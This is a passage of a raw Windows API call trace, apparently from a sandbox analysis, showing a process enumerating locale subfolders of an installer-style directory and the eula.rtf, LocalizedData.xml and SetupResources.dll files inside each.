(lpString="1029") returned 4 [0158.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x250) returned 0x69d9f0 [0158.623] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\*", lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x677eb0 [0158.624] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.624] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.624] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0158.624] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.624] lstrlenW (lpString="eula.rtf") returned 8 [0158.625] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x66fa18 [0158.625] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13c4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0158.625] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.625] lstrlenW (lpString="LocalizedData.xml") returned 17 [0158.625] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb2) returned 0x689df0 [0158.625] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0158.625] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.625] lstrlenW (lpString="SetupResources.dll") returned 18 [0158.625] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0158.626] FindClose (in: hFindFile=0x677eb0 | out: hFindFile=0x677eb0) returned 1 [0158.626] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69d9f0 | out: hHeap=0x660000) returned 1 [0158.626] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1030", cAlternateFileName="")) returned 1 [0158.626] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.626] lstrlenW (lpString="1030") returned 4 [0158.626] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x250) returned 0x69d9f0 [0158.626] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\*", lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x678130 [0158.627] FindNextFileW (in: hFindFile=0x678130, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.627] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.627] FindNextFileW (in: hFindFile=0x678130, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xcf2, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0158.627] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.627] lstrlenW (lpString="eula.rtf") returned 8 [0158.627] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x689eb0 [0158.627] FindNextFileW (in: hFindFile=0x678130, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12fb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0158.628] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.628] lstrlenW (lpString="LocalizedData.xml") returned 17 [0158.628] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb2) returned 0x689f58 [0158.628] FindNextFileW (in: hFindFile=0x678130, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0158.628] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.628] lstrlenW (lpString="SetupResources.dll") returned 18 [0158.628] FindNextFileW (in: hFindFile=0x678130, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0158.628] FindClose (in: hFindFile=0x678130 | out: hFindFile=0x678130) returned 1 [0158.628] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69d9f0 | out: hHeap=0x660000) returned 1 [0158.628] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1031", cAlternateFileName="")) returned 1 [0158.628] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.628] lstrlenW (lpString="1031") returned 4 [0158.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x250) returned 0x69d9f0 [0158.629] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\*", lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x677b30 [0158.630] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.630] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.630] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xd5b, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0158.630] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.630] lstrlenW (lpString="eula.rtf") returned 8 [0158.630] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x6a05b8 [0158.630] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x141aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0158.630] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.630] lstrlenW (lpString="LocalizedData.xml") returned 17 [0158.630] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb2) returned 0x6a0660 [0158.630] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0158.631] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.631] lstrlenW (lpString="SetupResources.dll") returned 18 [0158.631] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0158.631] FindClose (in: hFindFile=0x677b30 | out: hFindFile=0x677b30) returned 1 [0158.631] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69d9f0 | out: hHeap=0x660000) returned 1 [0158.631] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1032", cAlternateFileName="")) returned 1 [0158.631] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.631] lstrlenW (lpString="1032") returned 4 [0158.631] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x250) returned 0x69d9f0 [0158.631] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\*", lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x677b30 [0158.713] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.713] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.713] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x22ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0158.713] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.713] lstrlenW (lpString="eula.rtf") returned 8 [0158.713] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x6a0928 [0158.714] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1510c, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0158.714] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.714] lstrlenW (lpString="LocalizedData.xml") returned 17 [0158.714] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb2) returned 0x6a09d0 [0158.714] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0158.714] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.714] lstrlenW (lpString="SetupResources.dll") returned 18 [0158.714] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0158.714] FindClose (in: hFindFile=0x677b30 | out: hFindFile=0x677b30) returned 1 [0158.715] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69d9f0 | out: hHeap=0x660000) returned 1 [0158.715] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0158.715] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.715] lstrlenW (lpString="1033") returned 4 [0158.715] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x250) returned 0x69d9f0 [0158.715] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\*", lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x677b30 [0158.716] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.716] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.716] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd723cc00, ftCreationTime.dwHighDateTime=0x1cabb47, ftLastAccessTime.dwLowDateTime=0xd723cc00, ftLastAccessTime.dwHighDateTime=0x1cabb47, ftLastWriteTime.dwLowDateTime=0xd723cc00, ftLastWriteTime.dwHighDateTime=0x1cabb47, nFileSizeHigh=0x0, nFileSizeLow=0xc74, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0158.716] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.716] lstrlenW (lpString="eula.rtf") returned 8 [0158.716] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x6a0a90 [0158.716] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x47ad1a00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x47ad1a00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x47ad1a00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12db0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0158.716] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.717] lstrlenW (lpString="LocalizedData.xml") returned 17 [0158.717] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb2) returned 0x6a0b38 [0158.717] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0158.717] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.717] lstrlenW (lpString="SetupResources.dll") returned 18 [0158.717] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0158.717] FindClose (in: hFindFile=0x677b30 | out: hFindFile=0x677b30) returned 1 [0158.717] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69d9f0 | out: hHeap=0x660000) returned 1 [0158.717] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1035", cAlternateFileName="")) returned 1 [0158.717] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.717] lstrlenW (lpString="1035") returned 4 [0158.717] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x250) returned 0x69d9f0 [0158.718] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\*", lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x678130 [0158.719] FindNextFileW (in: hFindFile=0x678130, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, 